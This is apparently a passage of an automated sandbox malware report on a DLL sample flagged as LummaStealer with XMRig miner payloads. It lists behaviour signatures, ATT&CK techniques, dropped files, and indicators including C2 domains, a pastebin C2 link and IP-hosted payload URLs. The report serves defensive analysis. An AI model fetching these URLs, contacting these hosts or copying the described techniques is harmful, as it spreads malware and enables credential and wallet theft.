                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: Yara matchFile source: 00000008.00000003.1652122961.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648946137.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646851786.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647706451.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1649257545.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1645741913.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647006571.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651874968.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1649492847.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1645578502.0000000002935000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648747393.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1649364315.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1589055516.0000000002934000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647801568.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1645960083.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650396947.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1530908112.0000000002933000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1649640938.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647964141.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650698134.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650927285.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1618412925.0000000002934000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651620625.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1590244247.0000000002934000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1652377041.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648111608.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646498354.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647439452.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650206173.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646729840.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651442079.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647095515.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1589140688.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648508477.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651051467.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651358924.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648623199.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646390714.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646084375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648361138.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651541750.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650826392.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648832528.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646276375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1650575135.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647208910.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1652008990.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1648223332.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1652320133.0000000002944000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651214560.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1649107243.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647345197.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1529572587.0000000002931000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1647558990.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1618010358.0000000002935000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1646185343.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1651692251.0000000002936000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1530492113.0000000002933000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7232, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7232, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts31
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                12
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Windows Service
                21
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol41
                Data from Local System
                13
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Windows Service
                311
                Process Injection
                3
                Obfuscated Files or Information
                Security Account Manager231
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                21
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object Model2
                Clipboard Data
                4
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
                Virtualization/Sandbox Evasion
                LSA Secrets131
                Virtualization/Sandbox Evasion
                SSHKeylogging125
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                Process Injection
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Rundll32
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555757 Sample: n7ZKbApaa3.dll Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 103 pastebin.com 2->103 105 thinkyyokej.sbs 2->105 107 11 other IPs or domains 2->107 139 Suricata IDS alerts for network traffic 2->139 141 Found malware configuration 2->141 143 Malicious sample detected (through community Yara rule) 2->143 147 17 other signatures 2->147 15 loaddll32.exe 1 2->15         started        signatures3 145 Connects to a pastebin service (likely for C&C) 103->145 process4 process5 17 rundll32.exe 15->17         started        20 cmd.exe 1 15->20         started        22 rundll32.exe 15->22         started        24 conhost.exe 15->24         started        signatures6 125 Writes to foreign memory regions 17->125 127 Allocates memory in foreign processes 17->127 129 Injects a PE file into a foreign processes 17->129 26 aspnet_regiis.exe 1 17->26         started        131 Encrypted powershell cmdline option found 20->131 133 Uses schtasks.exe or at.exe to add and modify task schedules 20->133 135 Uses powercfg.exe to modify the power settings 20->135 137 Modifies power options to not sleep / hibernate 20->137 31 rundll32.exe 20->31         started        33 aspnet_regiis.exe 22->33         started        process7 dnsIp8 113 marshal-zhukov.com 188.114.97.3, 443, 49802, 49803 CLOUDFLARENETUS European Union 26->113 97 C:\...\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe, PE32 26->97 dropped 163 Query firmware table information (likely to detect VMs) 26->163 165 Found many strings related to Crypto-Wallets (likely being stolen) 26->165 167 Tries to steal Crypto Currency Wallets 26->167 169 LummaC encrypted strings found 26->169 35 OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe 8 26->35         started        171 Writes to foreign memory regions 31->171 173 Allocates memory in foreign processes 31->173 175 Injects a PE file into a foreign processes 31->175 39 aspnet_regiis.exe 1 31->39         started        file9 signatures10 process11 dnsIp12 89 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 35->89 dropped 91 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 35->91 dropped 149 Antivirus detection for dropped file 35->149 151 Multi AV Scanner detection for dropped file 35->151 42 cmd.exe 2 35->42         started        109 147.45.47.81, 49957, 49958, 49995 FREE-NET-ASFREEnetEU Russian Federation 39->109 111 steamcommunity.com 104.102.49.254, 443, 49793, 49794 AKAMAI-ASUS United States 39->111 93 C:\Users\user\...\MPDIZKEMMIDUY52JFU3.exe, PE32 39->93 dropped 153 Query firmware table information (likely to detect VMs) 39->153 155 Tries to harvest and steal ftp login credentials 39->155 157 Tries to harvest and steal browser information (history, passwords, etc) 39->157 159 Tries to steal Crypto Currency Wallets 39->159 44 MPDIZKEMMIDUY52JFU3.exe 2 39->44         started        file13 signatures14 process15 signatures16 47 Installer.exe 42->47         started        51 7z.exe 42->51         started        54 7z.exe 2 42->54         started        56 13 other processes 42->56 177 Antivirus detection for dropped file 44->177 179 Multi AV Scanner detection for dropped file 44->179 process17 dnsIp18 117 joxi.net 78.47.21.153, 49993, 80 HETZNER-ASDE Germany 47->117 119 Writes to foreign memory regions 47->119 121 Allocates memory in foreign processes 47->121 123 Injects a PE file into a foreign processes 47->123 58 RegSvcs.exe 47->58         started        95 C:\Users\user\AppData\Local\...\Installer.exe, PE32 51->95 dropped file19 signatures20 process21 dnsIp22 115 pastebin.com 172.67.19.24, 443, 49994 CLOUDFLARENETUS United States 58->115 99 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 58->99 dropped 101 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 58->101 dropped 181 Sample is not signed and drops a device driver 58->181 63 cmd.exe 58->63         started        66 cmd.exe 58->66         started        68 cmd.exe 58->68         started        file23 signatures24 process25 signatures26 183 Encrypted powershell cmdline option found 63->183 185 Modifies power options to not sleep / hibernate 63->185 70 powershell.exe 63->70         started        73 conhost.exe 63->73         started        75 powercfg.exe 63->75         started        85 4 other processes 63->85 77 conhost.exe 66->77         started        79 schtasks.exe 66->79         started        81 conhost.exe 68->81         started        83 schtasks.exe 68->83         started        process27 signatures28 161 Loading BitLocker PowerShell Module 70->161 87 WmiPrvSE.exe 70->87         started        process29

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                n7ZKbApaa3.dll71%ReversingLabsWin32.Trojan.Tedy
                n7ZKbApaa3.dll100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe100%AviraTR/Redcap.bgduw
                C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%AviraTR/Dldr.Agent.vfpsy
                C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe100%AviraTR/Redcap.bgduw
                C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%Joe Sandbox ML
                C:\ProgramData\Dllhost\WinRing0x64.sys5%ReversingLabs
                C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe79%ReversingLabsWin32.Coinminer.XMRig
                C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe79%ReversingLabsWin32.Coinminer.XMRig
                C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe92%ReversingLabsWin32.Trojan.LummaStealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://147.45.47.81/50%Avira URL Cloudsafe
                https://tamedgeesy.sbs/apis100%Avira URL Cloudmalware
                http://147.45.47.81/d0%Avira URL Cloudsafe
                http://crl.microIb~0%Avira URL Cloudsafe
                https://tamedgeesy.sbs/apiz100%Avira URL Cloudmalware
                http://147.45.47.81/30%Avira URL Cloudsafe
                https://tamedgeesy.sbs/apiY100%Avira URL Cloudmalware
                https://marshal-zhukov.com/kI100%Avira URL Cloudmalware
                https://relalingj.sbs/100%Avira URL Cloudmalware
                http://147.45.47.810%Avira URL Cloudsafe
                https://steambroadcastchat.akamaiz0%Avira URL Cloudsafe
                https://marshal-zhukov.c0%Avira URL Cloudsafe
                http://147.45.47.81/t0%Avira URL Cloudsafe
                http://147.45.47.81/m0%Avira URL Cloudsafe
                https://tamedgeesy.sbs/h100%Avira URL Cloudmalware
                http://147.45.47.81/350%Avira URL Cloudsafe
                https://marshal-zhukov.com/apiz100%Avira URL Cloudmalware
                https://marshal-zhukov.com/apion100%Avira URL Cloudmalware
                https://rottieud.sbs/apibs100%Avira URL Cloudmalware
                http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe0%Avira URL Cloudsafe
                https://marshal-zhukov.com/apig100%Avira URL Cloudmalware
                https://marshal-zhukov.com/apim100%Avira URL Cloudmalware
                https://marshal-zhukov.com/apie100%Avira URL Cloudmalware
                https://tamedgeesy.sbs/100%Avira URL Cloudmalware
                http://147.45.47.81/WatchDog.exeP0%Avira URL Cloudsafe
                https://marshal-zhukov.c#b0%Avira URL Cloudsafe
                http://147.45.47.81/WinRing0x64.sys100%Avira URL Cloudmalware
                https://community.cloudflare.sD0%Avira URL Cloudsafe
                http://147.45.47.81/WinRing0x64.sysP0%Avira URL Cloudsafe
                https://tamedgeesy.sbs/a100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                joxi.net
                78.47.21.153
                truefalse
                  high
                  steamcommunity.com
                  104.102.49.254
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      marshal-zhukov.com
                      188.114.97.3
                      truefalse
                        high
                        pastebin.com
                        172.67.19.24
                        truefalse
                          high
                          rottieud.sbs
                          unknown
                          unknownfalse
                            high
                            tamedgeesy.sbs
                            unknown
                            unknownfalse
                              high
                              repostebhu.sbs
                              unknown
                              unknownfalse
                                high
                                thinkyyokej.sbs
                                unknown
                                unknownfalse
                                  high
                                  brownieyuz.sbs
                                  unknown
                                  unknownfalse
                                    high
                                    explainvees.sbs
                                    unknown
                                    unknownfalse
                                      high
                                      relalingj.sbs
                                      unknown
                                      unknownfalse
                                        high
                                        pragapin.sbs
                                        unknown
                                        unknownfalse
                                          high
                                          ducksringjk.sbs
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              high
                                              https://pastebin.com/raw/dq3hWX27false
                                                high
                                                http://147.45.47.81/WinRing0x64.sysfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                thinkyyokej.sbsfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://www.cloudflare.com/learning/access-management/phishing-attack/RegSvcs.exe, 00000021.00000002.1979634479.0000000002454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://tamedgeesy.sbs/apisaspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.microIb~powershell.exe, 00000024.00000002.1947797275.0000000008AA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://tamedgeesy.sbs/apizaspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.gstatic.cn/recaptcha/aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://joxi.net/4Ak49WQH0GE3Nr.mp33Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=29ZhU4wRblaspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028A7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1508014312.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507674483.0000000002903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://147.45.47.81/daspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://joxi.net/4Ak49WQH0GE3Nr.mp36Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engliaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.000000000291D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://marshal-zhukov.com/kIaspnet_regiis.exe, 00000008.00000003.1498945336.00000000028EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://joxi.net/4Ak49WQH0GE3Nr.mp39Installer.exe, 0000001F.00000002.1912432871.0000000001502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgaspnet_regiis.exe, 00000007.00000003.1648458748.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://147.45.47.81RegSvcs.exe, 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.youtube.comaspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://147.45.47.81/5aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpfalse
